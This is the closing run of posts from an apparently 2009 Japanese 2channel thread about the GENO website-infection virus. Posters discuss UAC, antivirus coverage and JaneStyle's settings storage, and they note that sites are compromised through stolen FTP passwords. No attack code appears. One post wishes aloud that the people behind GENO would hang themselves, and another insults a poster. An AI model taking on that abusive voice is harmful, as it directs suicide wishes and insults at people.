964 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:11 ] そういえば感染するとうpだてがブロックされるとか何とかいってなかったっけ
965 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:37 ] >>937 どうやらJaneStyleは設定ファイルの保存場所までProgramFilesの中でやっちゃって動作に仕様が出るらしい。 Vistaが出た当初から言われてんだが今日までずっと対策してない。 最近アップデートされたんだがやったのはアフィリンクとYahooツールバーの強制添付だけ。
966 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:57 ] >>962 うん、Genoにまともに対応できるとしたらエンジンのアップデート必須 だろうね。
967 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:11 ] >>910 アウアウだな
968 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:29 ] >>963 それですか じゃあうちのPCはオンになってるんですねUAC
969 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:52 ] >>965 企業になったらやっぱりお金稼ぎがメインになるのね
970 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:56 ] 先生の普段のうpだてって何をしてるのか分からん
971 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:22 ] 企業まで感染するって PCにセキュリティ対策ソフトって普通入れるもんじゃないの?
972 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:43 ] Vistaの軽量化対策→UACをOFF
973 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:59 ] >>970 ちゃんと使ってくれてるかの生存確認です 先生自体は死んだままだけどな!
974 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:10 ] この流れ見てるとやっぱUACがデフォルトで有効だったのは大正解だと思うわ。 >>965 JaneStyleの開発力マジパネェ金の亡(ry
975 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:11 ] とにかくGENOのやつらはマジで首吊れ!
976 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:17 ] >>971 対策される前に入ったらアウトだろ。つまりそういうことだったんじゃね
977 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:25 ] >>965 そうだったのか… その発言今知った 知らなくてよかった
978 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:31 ] >>971 このスレちゃんと読んだか?
979 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:46 ] >>971 カカクコム事件とか知らないの? 馬鹿なの?
980 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:56 ] 普段見てるサイトが感染してたら終わりじゃんかよ
981 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:08 ] 誰か、次スレヨロシク 立てられなかった
982 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:31 ] >>971 小さい企業だとパソコン買ったまま使い続けている場合も多いよ。 対策ソフトの期限切れアラートが出っ放しとかよくある。
983 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:35 ] ウイルス対策ソフトが重いときの回避策でオフで切り抜けるってのも駄目だ
984 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:35 ] avast入れてたら自前に対策できてただろうね
985 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:46 ] とりあえず現在対応してるソフトまとめようず!
986 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:54 ] ノートン定義ファイルのところに更新したってのってねえぞ。
987 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:04 ] どうやってサイトが改ざんされるの? FTPパス抜かれてうんぬん?
988 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:10 ] バスター厨か?
989 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:17 ] >>981 テンプレこのままでいいのかな? それだったらこのまま立ててくるし
990 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:34 ] Style使ってるけど、設定とか全部同じフォルダの中だぞ 古いアーカイブからうpして使ってるからかな UACはNorton UAC Toolってのが使いやすいらしい
991 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:35 ] >>971 まともな企業は導入しているソフトウェアのバージョンなども含めて、 セキュリティに十分な対策を講じていますが、問題はそのような企業が(ry
992 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:56:48 ] >>987 そう
993 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:25 ] >>910 995までに立たなかったら立ててくる
994 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:51 ] >>951 最新の亜種に対策ってされたっけavast
995 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:51 ] >>938 >>他の所にチェックを入れるウィルスの亜種 もうそんなものが・・・ nLiteでいろいろいじったXPのせいか sqlsodbc.chmが最初から存在しないんだけど 安心はできないのね
996 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:57 ] >>989 このスレの間では気になるところはチラホラとあったけど 基本的には特に変化は無かったはず よろしく!
997 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:01 ] 先生目覚めてくれ・・・
998 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:05 ] >>990 元々レジストリとか使わないから適当なフォルダに突っ込んでも問題無いんだよな それをわざわざシステムフォルダへ入れようとするんだから頭悪い
999 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:20 ] 次スレ GENOウイルススレ ★9 pc11.2ch.net/test/read.cgi/sec/1242489450/
1000 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:21 ] 1000ならネット壊滅
1001 名前:1001 [Over 1000 Thread] このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。